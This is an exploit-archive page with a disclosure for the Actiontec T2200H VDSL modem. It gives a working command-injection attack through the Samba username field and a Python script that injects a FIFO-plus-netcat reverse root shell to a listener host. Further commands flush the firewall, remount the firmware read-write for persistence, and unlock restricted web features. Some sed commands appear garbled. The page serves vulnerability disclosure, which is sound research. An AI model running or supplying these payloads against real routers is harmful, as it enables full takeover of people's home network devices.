exploit the possibilities

Actiontec T2200H Remote Reverse Root Shell

Actiontec T2200H Remote Reverse Root Shell
Posted Aug 16, 2016
Authored by Andrew Klaus

Actiontec T2200H allows for command injection that provides a remote root reverse shell.

tags | exploit, remote, shell, root
MD5 | 9489a774d63572ecee9b06a196dac3fd

Actiontec T2200H Remote Reverse Root Shell

Change Mirror Download
###  Device Details
Vendor: Actiontec (Telus Branded, but may work on others)
Model: T2200H (but likely affecting other similar models of theirs)
Affected Firmware: T2200H-31.128L.03
Device Manual:
http://static.telus.com/common/cms/files/internet/telus_t2200h_user_manual.pdf

Reported: November 2015
Status: Fixed on newly pushed firmware version
CVE: Not needed since update is pushed by the provider.

The Telus Actiontec T2200H is Telusa standard bonded VDSL2 modem. It
incorporates 2 VDSL2 bonded links with a built-in firewall, bridge mode,
802.11agn wireless, etc.

### Summary of Findings

- root shell access can be obtained as long as an attacker has a login to
the web UI. The password can always be reset by knowing the device serial
number printed on the device, if the default password hasn't been changed.
- There are 2 separate firmware partitions (/dev/mtdblock0 and
/dev/mtdblock1) that can be mounted read-write and then modified with
additional files or configuration - surviving reboots and factory resets.
- TR-069 settings can be modified to not check in to the management server.
This means that future updates would be impossible without flashing the
device locally.

### Running single shell commands

Under Advanced Setup > Samba Configuration update either the Samba Username
or Password with the following: a;iptables -Fa. A USB flash drive needs to
be plugged into the USB port on the rear of the modem when running the
exploit from the web GUI. Anything run in this field is executed as the
root user.

Now after running nmap, all listening ports are open:

$ nmap -p 1-10000 192.168.1.254
Starting Nmap 6.49SVN ( https://nmap.org ) at 2015-11-08 22:14 MST
Nmap scan report for 192.168.1.254
Host is up (0.016s latency).
Not shown: 9991 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
80/tcp open http
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
5431/tcp open park-agent
7547/tcp open unknown

### Obtaining reverse root shell

Create a netcat session locally: nc -k -l 5555

Next weall run the following python code to allow us to pipe /bin/sh back
to us. Before running the following python code, you will need to login
successfully to the web-ui through http://192.168.1.254. 192.168.1.9 is
the IP of the machine listening on netcat.

```
import requests
s = requests.session()
smb_post = { "action" : "savapply",
"smbdEnable" : '1',
"smbdPasswd" : "123",
"smbdUserid" : ";rm /var/fifo2; mknod /var/fifo2 p",
"smbdVolume" : 'usb1_1',
"smbdWorkgroup" : "WORKGROUP"}

# creating the fifo pipe
s.post("http://192.168.1.254/fileshare.cmd", smb_post)
smb_post["smbdUserid"] = ";cat /var/fifo2 |/bin/sh -i 2>&1 |nc 192.168.1.9
5555 > /var/fifo2"
# Using the pipe to send a shell over netcat
s.post("http://192.168.1.254/fileshare.cmd", smb_post)
```

Your netcat listener should now be prompted with a root busybox shell:

$ nc -k -l 5555
BusyBox v1.17.2 (2013-12-27 18:49:15 PST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# cat /etc/image_version
T2200H-311283BGW0011043
#


### Other Discoveries

Mounting root filesystem read+write:
`mount -t jffs2 -o remount,rw mtd:rootfs`

Mounting partition 2 read-write:
`mount -t jffs2 -o rw /dev/mtdblock1 /mnt`

To allow unrestricted access of the web features (enabling telnet, firmware
flash, TR-069 configuration, etc.)
After the root filesystem is mounted read-write:
```
cat /webs/perm.txt | sed as/ 4/ 7/a | /webs/perm.txt
cat /webs/perm2.txt | sed as/ 4/ 7/a | /webs/perm2.txt
killall -HUP httpd
```


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    10 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    1 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close